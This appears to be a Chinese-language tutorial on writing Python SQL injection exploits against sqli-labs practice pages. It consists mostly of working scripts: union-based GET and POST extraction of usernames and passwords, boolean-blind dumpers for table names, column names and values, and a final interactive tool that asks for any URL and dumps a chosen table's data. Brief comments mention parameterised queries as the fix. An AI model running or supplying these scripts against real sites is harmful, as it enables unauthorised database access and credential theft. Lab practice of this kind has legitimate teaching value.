import requests
import re

# Union-based extraction against the local `Less-1` lab page: the injected
# `union select` folds every username/password pair into one `~...~`-delimited
# string, which is then cut out of the returned HTML with a regex.
# Server-side, a parameterised query for `id` removes the issue entirely; in
# logs the `union select` / `group_concat` tokens in the query string are the
# obvious signal.
url = 'http://sql.com/Less-1/'
payload = "?id=-1' union select 1,group_concat('~',username,',',password,'~'),3 from users --+"

# Both parts are already str, so plain concatenation yields the same target.
target = url + payload
response = requests.get(target)
page = response.text

# Every `~...~` group in the page body is one extracted row.
result = re.findall('~(.*?)~', page)
print(result)
引入re和requests的库,然后初始化好我们的payload
这里把url和payload拼接好,先转化成str型
然后得到响应以后的网页的源代码
然后利用正则匹配去匹配我们的数据
POST类型的SQL注入exp编写
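import requests
import re

# Same union-based extraction as the GET variant, but the `Less-11` lab page
# reads the injectable value from a login form, so the payload travels in the
# POST body (`uname`) and the comment terminator is `#` instead of `--+`.
payload = "1' union select 1,group_concat('~',username,',',password,'~') from users #"

response = requests.post(
    url='http://sql.com/Less-11/',
    # Header names must be spelled exactly: a misspelled name (the earlier
    # draft had 'Conternt-Type') is just sent as an unknown header and ignored.
    # requests already sets this header for a dict `data=`; the explicit value
    # only pins the charset.
    headers={
        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'
    },
    data={
        'uname': payload,
        'passwd': 1,
        'submit': 'Submit'
    }
)
text = response.text
# Every `~...~` group in the page body is one extracted row.
print(re.findall('~(.*?)~', text))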
import requests
import re

# Boolean-based blind extraction against the `Less-8` lab page: the page only
# shows 'You are in' when the injected condition is true, so each character of
# each table name is recovered by testing one ASCII value per request
# (5 rows x 29 positions x 97 candidates). That request volume, and the
# `information_schema.tables` substring, are what a log review would flag;
# the fix is a parameterised query for `id`.
url = 'http://sql.com/Less-8/'
TRUE_MARKER = 'You are in'

for table_index in range(0, 5):
    table = ''
    for position in range(1, 30):
        for code in range(31, 128):
            payload = (
                "?id=1' and (select ascii(substr((select table_name from "
                "information_schema.tables where table_schema=database() limit "
                f"{table_index},1) ,{position},1)) = {code}) --+"
            )
            page = requests.get(url + payload).text
            # A hit appends the character; the remaining candidates for this
            # position are still tried, exactly as in the original loop.
            if TRUE_MARKER in page:
                table = table + chr(code)
    print(f"第{table_index + 1}个表的表名是:{table}")
print('结束')
接下来是爆列名的exp
import requests
import re

# Second step of the `Less-8` boolean-blind walk-through: the same
# one-request-per-character oracle, now reading column names of `users`
# from `information_schema.columns` (up to 10 columns, 29 characters each).
url = 'http://sql.com/Less-8/'
TRUE_MARKER = 'You are in'

for column_index in range(0, 10):
    column = ''
    for position in range(1, 30):
        for code in range(31, 128):
            payload = (
                "?id=1' and (select ascii(substr((select column_name from "
                "information_schema.columns where table_name='users' limit "
                f"{column_index},1) ,{position},1)) = {code}) --+"
            )
            page = requests.get(url + payload).text
            if page.find(TRUE_MARKER) != -1:
                column = column + chr(code)
    print(f"第{column_index + 1}个列的列名是:{column}")
print('结束')
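import requests
import re

# Third step of the `Less-8` boolean-blind walk-through: with table and column
# names known, the same oracle reads the `username` values out of `users`.
# Each confirmed character is appended to `value`, the string that is printed
# per row (the earlier draft appended to an undefined `column`, which raised a
# NameError on the first hit and otherwise printed an empty `value`). This
# matches the accumulation used by the interactive script below.
url = 'http://sql.com/Less-8/'
TRUE_MARKER = 'You are in'

for row in range(0, 10):
    value = ''
    for position in range(1, 30):
        for code in range(31, 128):
            payload = (
                "?id=1' and (select ascii(substr((select username from users limit "
                f"{row},1) ,{position},1)) = {code}) --+"
            )
            page = requests.get(url + payload).text
            if page.find(TRUE_MARKER) != -1:
                value = value + chr(code)
    print(f"第{row + 1}个值是:{value}")
print('结束')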
import requests

# Interactive menu that bundles the three `Less-8` boolean-blind steps
# (table names, column names of `users`, values of a chosen column). Every
# step uses the same oracle: the page contains 'You are in' only when the
# injected comparison is true, so one character is confirmed per request.
TRUE_MARKER = 'You are in'


def _condition_holds(url, payload):
    """Return True when the page at url+payload shows the true-branch marker."""
    page = requests.get(str(url) + str(payload)).text
    return page.find(TRUE_MARKER) != -1


def _dump_tables(url):
    """Print the first five table names of the current database."""
    for i in range(0, 5):  # number of tables to read
        table = ''
        for j in range(0, 30):  # table-name length
            for k in range(31, 128):  # ASCII value of one character
                payload = (
                    "?id=1' and (select ascii(substr((select table_name from "
                    "information_schema.tables where table_schema=database() limit "
                    f"{i},1) ,{j},1)) = {k}) --+"
                )
                if _condition_holds(url, payload):
                    table = table + chr(k)
        print(f"第{i + 1}个表的表名是:{table}")


def _dump_columns(url):
    """Print the first five column names of the `users` table."""
    for a in range(0, 5):  # number of columns to read
        column = ''
        for b in range(0, 30):  # column-name length
            for c in range(31, 128):  # ASCII value of one character
                payload = (
                    "?id=1' and (select ascii(substr((select column_name from "
                    "information_schema.columns where table_name='users' limit "
                    f"{a},1) ,{b},1)) = {c}) --+"
                )
                if _condition_holds(url, payload):
                    column = column + chr(c)
        print(f"第{a + 1}个列名是:{column}")


def _dump_values(url, zd, biao):
    """Print the first five values of column `zd` in table `biao`."""
    for d in range(0, 5):  # number of values to read
        value = ''
        for e in range(0, 30):  # value length
            for f in range(31, 128):  # ASCII value of one character
                payload = (
                    f"?id=1' and (select ascii(substr((select {zd} from {biao} limit "
                    f"{d},1) ,{e},1)) = {f}) --+"
                )
                if _condition_holds(url, payload):
                    value = value + chr(f)
        print(f"第{d + 1}个值是:{value}")


url = input("输入需要注入的URL:")
print("1.爆当前数据库的数据表名")
print("2.爆指定数据表的列名")
print("3.爆出数据库里的数据")
print("输入你要使用的功能(输入数字1,2或者3):")
select = input("请输入你选择的功能:")

# `select` never changes, so an if/elif chain is equivalent to the original
# sequence of independent ifs.
if select == '1':
    _dump_tables(url)
elif select == '2':
    _dump_columns(url)
elif select == '3':
    zd = input("要爆哪一列的数据:")
    biao = input("要爆哪一个表的数据:")
    _dump_values(url, zd, biao)